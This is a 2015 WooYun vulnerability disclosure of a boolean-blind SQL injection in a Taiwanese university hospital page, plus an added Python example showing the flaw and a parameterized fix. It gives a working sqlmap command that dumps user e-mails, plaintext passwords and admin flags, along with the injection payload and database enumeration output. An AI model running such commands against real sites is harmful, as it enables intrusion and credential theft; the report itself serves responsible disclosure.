
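Vulnerability summary

Bug ID: wooyun-2015-0146734

Title: SQL injection in a page of National Cheng Kung University Hospital, Taiwan (boolean-based blind / user e-mail addresses and plaintext passwords exposed) (Taiwan region)

Vendor: National Cheng Kung University, Taiwan

Author: 路人甲

Submitted: 2015-10-14 17:13

Fixed: 2015-11-30 00:24

Disclosed: 2015-11-30 00:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (Hitcon, the Taiwan internet vulnerability reporting platform)

Source: http://www.wooyun.org; for questions or help, contact [email protected]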


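Vulnerability details

Disclosure status:

2015-10-14: Details reported to the vendor; awaiting vendor handling
2015-10-16: Vendor confirmed; details disclosed to the vendor only
2015-10-26: Details disclosed to core white hats and relevant domain experts
2015-11-05: Details disclosed to regular white hats
2015-11-15: Details disclosed to trainee white hats
2015-11-30: Details disclosed to the public

Brief description:

A page of National Cheng Kung University Hospital, Taiwan, is vulnerable to SQL injection (boolean-based blind / user e-mail addresses and plaintext passwords exposed)

Detailed description:

Tested with sqlmap. Test URL: http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0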

python sqlmap.py -u "http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0" -p Type --technique=B --random-agent -D nckmWeb -T www.UserAccount -C Userid,UserEmail,Userpwd,IsAdmin --dump --threads=10

Proof of vulnerability:

---
Parameter: Type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Type=11 AND 4724=4724&ContentPage=0
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008


back-end DBMS: Microsoft SQL Server 2008
database management system users [2]:
[*] lsn
[*] sa


back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] Exam100
[*] Exam81
[*] Exam91
[*] HSYS
[*] LISDB_inquiry
[*] master
[*] model
[*] msdb
[*] mv4
[*] nckmWeb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WorkTemp


Database: nckmWeb
[21 tables]
+-----------------------+
| www.Dept |
| www.FileDownLoads |
| www.FileDownLoads_old |
| www.FileType |
| www.GroupAccess |
| www.News |
| www.NewsPgAccess |
| www.News_bk |
| www.News_old |
| www.News_tmp |
| www.PageProfile |
| www.SiteCounter |
| www.Speech |
| www.SystemProfile |
| www.Ugroup |
| www.UserAccess |
| www.UserAccount |
| www.UserGroup |
| www.WebLinks |
| www.WebLinks_old |
| www.WebLinks_tmp |
+-----------------------+


Database: nckmWeb
Table: www.UserAccount
[14 columns]
+-------------+
| Column |
+-------------+
| DeptID |
| IsAdmin |
| IsEabled |
| KeyID |
| SysDate |
| SysUserid |
| UserEmail |
| Userid |
| UsernNaC |
| UsernNaE |
| UsernNikeNa |
| UserNote |
| Userpwd |
| Userpwdhint |
+-------------+


Database: nckmWeb
Table: www.UserAccount
[21 entries]

Suggested fix:

Add filtering.

Copyright notice: when reposting, please credit the source 路人甲@乌云
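The fix above in concrete form, as an added example that is not part of the original report or the vendor's code: it shows why the `Type=11 AND 4724=4724` payload works against a concatenated query, and how a strict integer check plus a bound parameter closes it. Assumptions: SQLite stands in for SQL Server, the `pages` table, its columns and the function names are hypothetical, and the always-false variant `4724=4725` is constructed for contrast.

```python
import sqlite3

# Constructed stand-in data: SQLite replaces SQL Server, and the "pages"
# table and its columns are hypothetical, not taken from the report.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (type INTEGER, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(11, "Home style"), (12, "News")])
    return db

def lookup_vulnerable(db, type_param):
    """'Before': the raw query-string value is concatenated into the SQL text."""
    sql = "SELECT title FROM pages WHERE type = " + type_param
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, type_param):
    """'After': strict integer allow-list check, then a bound parameter."""
    if not (type_param.isascii() and type_param.isdigit()
            and len(type_param) <= 9):
        raise ValueError("Type must be a non-negative integer")
    rows = db.execute("SELECT title FROM pages WHERE type = ?",
                      (int(type_param),))
    return [row[0] for row in rows]

def demo():
    db = make_db()
    results = {
        # Payload from the report: the appended condition is always true,
        # so the page renders normally.
        "vuln_true": lookup_vulnerable(db, "11 AND 4724=4724"),
        # Constructed always-false variant: the page comes back empty.
        # That true/false difference is the boolean-blind signal.
        "vuln_false": lookup_vulnerable(db, "11 AND 4724=4725"),
        "hard_ok": lookup_hardened(db, "11"),
    }
    try:
        lookup_hardened(db, "11 AND 4724=4724")
        results["hard_rejected"] = False
    except ValueError:
        results["hard_rejected"] = True
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Binding the parameter is what removes the injection; the integer check additionally lets the application reject and log malformed `Type` values before they reach the database.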


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-10-16 00:23

Vendor reply:

Thank you for the report.

Latest status:

None